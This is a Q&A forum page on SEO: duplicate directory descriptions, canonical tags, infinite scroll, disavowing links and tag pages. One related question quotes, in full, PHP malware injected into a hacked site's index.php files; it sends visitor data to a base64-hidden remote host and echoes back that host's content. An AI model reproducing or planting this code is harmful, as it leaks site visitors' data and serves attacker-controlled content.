Does using the same description in all directories affect SEO or not? (The description is unique on the website itself)
-
Hi,
I would like to create some directory listings. When I reviewed the recent work of someone I was considering for the job, I saw that he had used the same description in all 50 directories he submitted for a client. Does this affect SEO or not?
-
Hi Anu,
To help us better understand the question, would it be possible to record a video message (have you tried Loom?) showing us what you're wanting assistance with?
Best,
Zack -
Would you mind providing screenshots or URLs?
-
I'm not sure I understand the question. Are you saying that you have around 50 pages with the same content? Duplicate content is not good for SEO: https://moz.com/learn/seo/duplicate-content
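If the duplicate pages live on your own site, the usual remedy is to pick one preferred URL and point the copies at it with a canonical tag. A minimal sketch, assuming a PHP-templated page (the URL is a placeholder):

<?php
// Emit a canonical link tag in the <head> of each duplicate page so
// search engines consolidate signals on the one version you want indexed.
// The URL below is a placeholder - substitute your preferred page.
$canonicalUrl = 'https://www.example.com/preferred-page/';
?>
<link rel="canonical" href="<?php echo htmlspecialchars($canonicalUrl, ENT_QUOTES); ?>">

Note that this only helps with duplicates you control; identical descriptions syndicated to 50 third-party directories cannot be canonicalized from your own site.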
Related Questions
-
SEO Links in Footer?
Hi, One of my clients uses a pretty powerful SEO tool; I won't mention the name. It now has a "link equity" feature, which they are using on a lot of their clients' sites, including those of tons of Fortune 500 companies. It involves adding footer links to your site that change based on the content of the page they are on. The machine learning tries to figure out the most related pages and links to them, with the heading tag of each target page as the anchor text. Initially this sounds very spammy to me. But then again, it works a lot like the "related products" modules that many companies use. The goal of this tool is to build up internal linking, especially to deeper pages on their site; they currently have over 10,000 pages. What are everyone's thoughts on this strategy?
White Hat / Black Hat SEO | | vetofunk2 -
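For anyone wondering what such a tool does mechanically, here is a toy sketch in PHP. The $pages array and the keyword-overlap scoring are invented for illustration; a real tool's machine learning would be far more sophisticated.

<?php
// Toy sketch: choose "related" pages by keyword overlap and render
// footer links that use each target page's heading as anchor text.
// All data and the scoring heuristic here are invented for illustration.
$pages = [
    ['url' => '/blue-widgets', 'heading' => 'Blue Widgets Guide', 'keywords' => ['widgets', 'blue', 'guide']],
    ['url' => '/red-widgets',  'heading' => 'Red Widgets Guide',  'keywords' => ['widgets', 'red', 'guide']],
    ['url' => '/about-us',     'heading' => 'About Our Company',  'keywords' => ['company', 'history']],
];

function relatedPages(array $current, array $all, int $limit = 3): array {
    $scored = [];
    foreach ($all as $page) {
        if ($page['url'] === $current['url']) {
            continue; // never link a page to itself
        }
        $overlap = count(array_intersect($current['keywords'], $page['keywords']));
        if ($overlap > 0) {
            $scored[] = ['score' => $overlap, 'page' => $page];
        }
    }
    usort($scored, fn($a, $b) => $b['score'] <=> $a['score']);
    return array_slice(array_column($scored, 'page'), 0, $limit);
}

// Render the footer block for the first page.
foreach (relatedPages($pages[0], $pages) as $related) {
    echo '<a href="' . htmlspecialchars($related['url']) . '">'
        . htmlspecialchars($related['heading']) . '</a>' . "\n";
}

The design question the asker raises is whether algorithmically generated footer links like these genuinely help users or merely sculpt link equity.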
Infinite Scrolling on Publisher Sites - is VentureBeat's implementation really SEO-friendly?
I've just begun a new project auditing the site of a news publisher. In order to increase pageviews and thus advertising revenue, at some point in the past they implemented something so that as many as 5 different articles load per article page. All articles are loaded at the same time, and from looking at Google's cache and the errors flagged in Search Console, Google treats it as one big mass of content, not separate pages. Another thing to note is that when a user scrolls down, the URL does in fact change when you get to the next article. My initial thought was to remove this functionality and just load one article per page. However, I happened to notice that VentureBeat.com uses something similar. They use infinite scrolling so that the other articles on the page (in a 'feed' style) only load when a user scrolls to the bottom of the first article. I checked Google's cached versions of the pages and it seems that Google also only reads the first article, which seems like an ideal solution. This has the additional benefit of speeding up page load time. My question is: is VentureBeat's implementation actually that SEO-friendly or not? VentureBeat have 'sort of' followed Google's guidelines on how to implement infinite scrolling https://webmasters.googleblog.com/2014/02/infinite-scroll-search-friendly.html by using prev and next tags for pagination https://support.google.com/webmasters/answer/1663744?hl=en. However, isn't the point of pagination to list multiple pages in a series (i.e. page 2, page 3, page 4 etc.) rather than just other related articles? Here's an example - http://venturebeat.com/2016/11/11/facebooks-cto-explains-social-networks-10-year-mission-global-connectivity-ai-vr/ Would be interesting to hear from someone who has dealt with this first-hand, or just has an opinion. Thanks in advance! Daniel
White Hat / Black Hat SEO | | Daniel_Morgan1 -
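For reference, the approach in the Google blog post linked above boils down to giving each article in the feed its own crawlable, paginated component URL and connecting the series in the <head>. A minimal sketch, with an invented ?page= URL scheme and page count:

<?php
// Sketch: rel="prev"/rel="next" tags for the paginated component pages
// behind an infinite-scroll feed. The URL pattern and $totalPages value
// are invented for illustration.
$base       = 'https://www.example.com/news/some-story/';
$page       = max(1, (int)($_GET['page'] ?? 1));
$totalPages = 5;

if ($page > 1) {
    // Page 2's "prev" is the base URL itself, not ?page=1.
    $prev = ($page === 2) ? $base : $base . '?page=' . ($page - 1);
    echo '<link rel="prev" href="' . htmlspecialchars($prev) . '">' . "\n";
}
if ($page < $totalPages) {
    echo '<link rel="next" href="' . $base . '?page=' . ($page + 1) . '">' . "\n";
}

Combined with history.pushState updating the address bar as the reader scrolls, this is the "search-friendly infinite scroll" pattern that post describes.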
Active Rain and SEO
I have been an Active Rain member for a long time. When I check my website's backlinks, I cannot find any from Active Rain. I just updated my Active Rain profile and upgraded to their paid subscription. Can you tell me if this blog is creating a followed link back to my website at www.RealEstatemarketLeaders.com? The blog on Active Rain is here: http://activerain.trulia.com/blogsview/4529309/hud-homes-for-sale-in-tri-cities-wa
White Hat / Black Hat SEO | | Brandon_Patton0 -
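One way to answer this yourself is to fetch the blog post and inspect the rel attribute on any anchor pointing at your domain. A rough sketch, assuming allow_url_fopen is enabled (otherwise swap in cURL):

<?php
// Rough sketch: fetch a page and report whether links to a given domain
// carry rel="nofollow".
$pageUrl      = 'http://activerain.trulia.com/blogsview/4529309/hud-homes-for-sale-in-tri-cities-wa';
$targetDomain = 'realestatemarketleaders.com';

$html = @file_get_contents($pageUrl);
if ($html === false) {
    exit("Could not fetch the page\n");
}

$doc = new DOMDocument();
@$doc->loadHTML($html); // suppress warnings from messy real-world HTML

foreach ($doc->getElementsByTagName('a') as $anchor) {
    $href = $anchor->getAttribute('href');
    if (stripos($href, $targetDomain) !== false) {
        $rel = $anchor->getAttribute('rel');
        echo $href . ' => ' . ($rel !== '' ? 'rel="' . $rel . '"' : 'no rel attribute (followed)') . "\n";
    }
}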
Is hashtag linking between 4 different informational text pages, with a canonical tag pointing to the URL without the hashtag, a white hat SEO practice?
Hey guys, I need help; hope it is a simple question: if I have 4 text pages that visitors move between through hashtag links, while staying on the same page in terms of user experience, can I set the URL free of hashtags as the canonical URL? Is this acceptable white hat practice? And will this help pass value, search queries, and therefore ranking power to the canonical URL in this case? Hoping for your answers. Best regards, and thanks in advance!
White Hat / Black Hat SEO | | Muhammad_Jabali0 -
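One point that largely decides this: the browser never sends the part after the # to the server, so all four hashtag "pages" are a single URL to both your server and to crawlers. A quick demonstration:

<?php
// Request this script as /info.php#section-3 and the fragment is
// simply absent on the server side:
echo $_SERVER['REQUEST_URI']; // prints "/info.php" - no "#section-3"

Because the fragment variants are not distinct URLs, a single canonical tag on the page already covers them; there are no separate hashtag URLs for Google to consolidate.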
Hit by negative SEO
I think my site got hit by a negative SEO campaign. We got nailed by the latest Google update and our traffic dropped significantly. We don't buy links, ask for links, do link exchanges, etc. Since the last update was all about spammy backlinks, I downloaded our backlinks from Google Webmaster Tools just to see if there was any information in there. There are tons, hundreds, thousands of backlinks from spammy sites to us. Sites that are spammy as heck and sell backlinks in the footer. I can only assume someone went after us with a negative SEO campaign. We're the #3 site in a hot market. Is the only way to combat this to disavow all those spammy backlinks with the Google disavow tool? We also have a manual penalty on our site. I've submitted a reconsideration request and have heard nothing. Please advise.
White Hat / Black Hat SEO | | CFSSEO0 -
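For reference, the disavow file itself is just a plain-text list uploaded through Google's disavow tool; domain: lines are usually preferable when an entire site is spammy. A small sketch with made-up domains:

# Disavow file sketch - the domains below are made up for illustration.
# One directive per line; lines starting with # are comments.
# Disavow every link from an entire domain:
domain:spammy-links-example.com
domain:paid-footer-links-example.net
# Or disavow a single page:
http://another-example.org/spam-page.html

Note that a disavow file alone does not lift a manual penalty; the reconsideration request still has to document the cleanup that was done.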
Website has been hacked - will this hurt our ranking?
Today we found out that one of our websites has been hacked and that this code had been injected into multiple index.php files:

<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false)
        && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
        && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
        && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
        && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create bot analitics
            $stCurlLink = base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw')
                . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                . '&useragent=' . urlencode($sUserAgent)
                . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                . '&check=' . isset($_GET['look']);
            @$stCurlHandle = curl_init($stCurlLink);
        }
    }
    if ($stCurlHandle !== NULL)
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0] == "O")
        {
            $sResult[0] = " ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

After some searching I found other people mentioning this problem too. They were also saying that it could have an impact on your search rankings. My first question: will this hurt my rankings? Second question: is there something I can do to tell the search engines about the hack so that we don't lose ranking because of it? Grtz, Ard
White Hat / Black Hat SEO | | GTGshops0 -
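As for what the injected code does: for any visitor whose user agent matches none of the listed browser and bot names, it reports the visitor's IP, user agent, host, and path to a remote script, then echoes part of the response into the page. The remote address is hidden in the base64 string and can be inspected safely offline:

<?php
// Decode the obfuscated callback URL from the injected code
// (inspect it only - do not visit the URL).
echo base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw');
// prints: http://mbrowserstats.com/statH/stat.php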
SEO best practice: Use tags for SEO purposes? To add or not to add to the sitemap?
Hi Moz community, New to the Moz community, and hopefully this is the first post/comment of many to come. I am somewhat new to the industry and have a question that I would like to ask and get your opinions on. It most likely has a very simple answer, but here goes: I have a website for a local moving company (so small amounts of traffic and very few pages) that was built on WordPress. I was told when I first started that I should create tags for some of the cities serviced in the area. I did so and assigned the first blog post to each tag. That turned out to be about 12-15 tags, which in turn created 12-15 additional pages. These tags are listed in the footer area of each page. There are fewer than 20 pages on the website excluding the tags. Now, I know that each of these tag pages is showing as duplicate content. This just does not seem like best practice to me. As someone quite new to the industry, what would you suggest I do to best deal with this situation? Should I even keep the tags? Should I keep them but not index them? Should I add/remove them from the sitemap? Thanks in advance for any help, and I look forward to being a long-time member of SEOMoz.
White Hat / Black Hat SEO | | BWrightTLM0 -
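If the tags stay but should stay out of the index, WordPress can add a noindex robots tag to tag archives from the theme. A minimal sketch for a theme's functions.php (an SEO plugin setting achieves the same thing without code):

<?php
// Minimal sketch for functions.php: ask search engines not to index
// tag archive pages while still following the links on them.
add_action('wp_head', function () {
    if (is_tag()) {
        echo '<meta name="robots" content="noindex,follow">' . "\n";
    }
});

Pages that are noindexed should also be left out of the XML sitemap, since a sitemap is meant to list only the URLs you want indexed.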
What do you think are some of the least talked about topics of SEO?
What do you think are some of the least talked about topics of SEO? Do you think these topics need to be given more attention? Why do you think they've been ignored?
White Hat / Black Hat SEO | | TheOceanAgency0